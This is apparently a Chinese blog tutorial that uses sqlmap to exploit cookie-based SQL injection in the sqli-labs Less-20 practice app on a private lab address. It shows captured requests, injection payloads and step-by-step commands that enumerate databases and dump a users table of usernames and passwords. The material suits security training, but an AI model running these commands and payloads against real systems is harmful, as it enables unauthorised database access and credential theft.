Sqlmap2021 -- Cookie注入

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,高可用系列 2核4GB
简介: Sqlmap2021 -- Cookie注入

一、检测Cookie注入

1、通过BurpSuite抓包,将封包内容保存到1.txt

GET /sqli/Less-20/index.php HTTP/1.1

Host: 192.168.139.129

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://192.168.139.129/sqli/Less-20/index.php

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: uname=admin; PHPSESSID=6t4bb3nb4rarqod4j073m038h4

Connection: close

2、判断是否存在注入

sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2

--cookie:指定参数

--level 2:等级2以上才会检测cookie注入

0a2653c851af460fa595bd959398a8f1.png

运行结果:

[16:44:49] [INFO] Cookie parameter 'uname' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable                                                                            

Cookie parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:

---

Parameter: uname (Cookie)

   Type: boolean-based blind

   Title: AND boolean-based blind - WHERE or HAVING clause

   Payload: uname=admin' AND 6679=6679 AND 'sdQh'='sdQh; PHPSESSID=6t4bb3nb4rarqod4j073m038h4

   Type: error-based

   Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)

   Payload: uname=admin' AND GTID_SUBSET(CONCAT(0x7162717171,(SELECT (ELT(6429=6429,1))),0x717a767a71),6429) AND 'whpT'='whpT; PHPSESSID=6t4bb3nb4rarqod4j073m038h4

   Type: time-based blind

   Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

   Payload: uname=admin' AND (SELECT 6802 FROM (SELECT(SLEEP(5)))pIcR) AND 'rFnD'='rFnD; PHPSESSID=6t4bb3nb4rarqod4j073m038h4

   Type: UNION query

   Title: Generic UNION query (NULL) - 3 columns

   Payload: uname=-4950' UNION ALL SELECT NULL,CONCAT(0x7162717171,0x4f62636a6e49426b5a415141657259517971566f6463496b714561576f4d58446459787146754d78,0x717a767a71),NULL-- -; PHPSESSID=6t4bb3nb4rarqod4j073m038h4

---

[16:44:55] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.6

[16:44:55] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'  

二、获取数据库

sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 --dbs

0a2653c851af460fa595bd959398a8f1.png

运行结果:

[16:57:57] [INFO] the back-end DBMS is MySQL

web application technology: Nginx 1.15.11, PHP 5.4.45

back-end DBMS: MySQL >= 5.6

[16:57:57] [INFO] fetching database names

do you want to URL encode cookie values (implementation specific)? [Y/n]

[16:57:59] [WARNING] reflective value(s) found and filtering out

available databases [10]:

[*] challenges

[*] dvwa

[*] information_schema

[*] mysql

[*] performance_schema

[*] pikachu

[*] security

[*] sys

[*] www_dgdg_com

[*] www_zm_com

[16:57:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

三、获取表名

sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security --tables

2d65d23f6d4748949b924e4057485923.png

运行结果:

[17:05:15] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.6

[17:05:15] [INFO] fetching tables for database: 'security'

do you want to URL encode cookie values (implementation specific)? [Y/n]

[17:05:16] [WARNING] reflective value(s) found and filtering out

Database: security

[4 tables]

+----------+

| emails   |

| referers |

| uagents  |

| users    |

+----------+

[17:05:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

四、获取字段名

sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security -T users --columns

0a2653c851af460fa595bd959398a8f1.png

运行结果:

[17:07:37] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.6

[17:07:37] [INFO] fetching columns for table 'users' in database 'security'

do you want to URL encode cookie values (implementation specific)? [Y/n]

[17:07:38] [WARNING] reflective value(s) found and filtering out

Database: security

Table: users

[3 columns]

+----------+-------------+

| Column   | Type        |

+----------+-------------+

| id       | int(3)      |

| password | varchar(20) |

| username | varchar(20) |

+----------+-------------+

[17:07:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'  

五、获取字段内容

sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security -T users --dump "username,password"

0eacb84100b54626af849e6b562bf92a.png

运行结果:

[17:09:08] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.45, Nginx 1.15.11

back-end DBMS: MySQL >= 5.6

[17:09:08] [INFO] fetching columns for table 'users' in database 'security'

[17:09:08] [INFO] fetching entries for table 'users' in database 'security'

do you want to URL encode cookie values (implementation specific)? [Y/n]

[17:09:09] [WARNING] reflective value(s) found and filtering out

Database: security

Table: users

[13 entries]

+----+------------+----------+

| id | password   | username |

+----+------------+----------+

| 1  | Dumb       | Dumb     |

| 2  | I-kill-you | Angelina |

| 3  | p@ssword   | Dummy    |

| 4  | crappy     | secure   |

| 5  | stupidity  | stupid   |

| 6  | genious    | superman |

| 7  | mob!le     | batman   |

| 8  | admin      | admin    |

| 9  | admin1     | admin1   |

| 10 | admin2     | admin2   |

| 11 | admin3     | admin3   |

| 12 | dumbo      | dhakkan  |

| 14 | admin4     | admin4   |

+----+------------+----------+

[17:09:09] [INFO] table 'security.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.139.129/dump/security/users.csv'                                              

[17:09:09] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

六、其他检测Cookie注入方法

1、检测是否存在注入

sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2

2、获取数据库名称

sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 --dbs

3、获取表名

sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security --tables

4、获取字段名

sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security -T users --columns

5、获取字段内容

sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security -T users --dump "username,password"

禁止非法,后果自负

相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助     相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
6月前
|
安全 数据库
17、cookie注入
17、cookie注入
54 0
|
6月前
|
数据安全/隐私保护
18、cookie注入(base64加密)
18、cookie注入(base64加密)
55 0
|
6月前
|
安全 数据库
小课堂 -- cookie注入
小课堂 -- cookie注入
25 0
|
6月前
|
数据安全/隐私保护
小课堂 -- cookie注入(base64加密)
小课堂 -- cookie注入(base64加密)
52 0
|
Web App开发 安全 关系型数据库
Sqlmap2021 -- Cookie注入
Sqlmap2021 -- Cookie注入
192 0
Sqlmap2021 -- Cookie注入
|
数据安全/隐私保护
18、cookie注入(base64加密)
18、cookie注入(base64加密)
149 0
18、cookie注入(base64加密)
|
安全 数据库
17、cookie注入
17、cookie注入
67 0
17、cookie注入
|
Web App开发 数据安全/隐私保护
|
SQL Web App开发 监控
Cookie注入实战(非SQL注入)
版权声明:本文可能为博主原创文章,若标明出处可随便转载。 https://blog.csdn.net/Jailman/article/details/78479075 cookie注入原理其实很简单,就是利用了session机制中的特性,只能说是特性,不能算是漏洞。
1850 0
|
15天前
|
存储 安全 搜索推荐
理解Session和Cookie:Java Web开发中的用户状态管理
理解Session和Cookie:Java Web开发中的用户状态管理
40 4